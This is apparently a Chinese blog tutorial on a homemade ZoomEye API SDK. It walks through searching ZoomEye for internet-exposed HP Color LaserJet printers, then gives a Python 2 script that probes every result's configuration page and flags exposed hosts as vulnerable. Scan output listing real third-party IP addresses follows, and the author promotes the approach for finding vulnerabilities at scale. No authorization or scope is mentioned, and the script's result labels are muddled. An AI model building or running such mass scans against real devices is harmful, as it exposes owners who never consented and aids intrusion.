版权声明:未经作者授权,禁止转载!
ZoomEye想必大家都很熟悉,自从官方开放了API,网上各种版本的SDK乱飞。今天我也来发一个自己写的。
首先我们从https://github.com/SEC08/ZoomEye-API-SDK下载以后,解压以后我们直接运行python setup.py install来安装这个模块。这个过程类似大家安装Python的其他模块,比如说常见的requests.这里不多介绍了。等待安装完成以后,我们就可以来调用了。
利用SDK登录ZoomEye:
#!/usr/bin/env python # -*-coding:utf-8 -*- import sys import requests import zoomeye.zoomeye as zoomeye test = zoomeye.zoomeye() username = 'your main@qq.com' password = 'your zoomeye account password' token = test.logIn(username, password)
接着我们调用了脚本中的搜索方法,搜索的query可以参考官方给出的使用说明。。
#!/usr/bin/env python
# -*-coding:utf-8 -*-
import sys
import requests
import zoomeye.zoomeye as zoomeye
test = zoomeye.zoomeye()
username = 'your main@qq.com'
password = 'your ZoomEye account password'
token = test.logIn(username, password)
result = test.search('web',query='HP Color LaserJet',page=1,facets='app,os')
print result
返回数据是json的格式,官方文档中有详细的说明,这里我大致做了处理。
#!/usr/bin/env python
# -*-coding:utf-8 -*-
import sys
import requests
import zoomeye.zoomeye as zoomeye
test = zoomeye.zoomeye()
username = 'your main@qq.com'
password = 'your ZoomEye account password'
token = test.logIn(username, password)
result = test.search('web',query='HP Color LaserJet',page=1,facets='app,os')
target = []
for i in result:
for x in i['matches']:
print x['ip']
target.append(x['ip'][0])
for ip in target:
try:
payload = '/hp/device/InternalPages/Index?id=ConfigurationPage'
url = 'http://' + ip + payload
res_exp = requests.get(url)
print '[-]checking url %s' % url
if res_exp.status_code == 200 and 'HomeDeviceName' in res_exp.content and 'HomeDeviceIp' in res_exp.content:
print '[+]%s is vul' % url
elif res_exp.status_code != 200:
print '[+]%s is static' % url
else:
pass
except Exception, e:
pass
然后结果是这样的:
[-]checking url http://192.185.150.112/hp/device/InternalPages/Index?id=ConfigurationPage [-]checking url http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage is static
这样是大致的演示过程,还有诸多的不足。这里想说的是,这是一个不错的漏扫模式,国内好多的安全厂商也都开始构建类似这样的工具。另外大家可以发挥自己的想象力和创造力。更快速的去挖到更多的漏洞。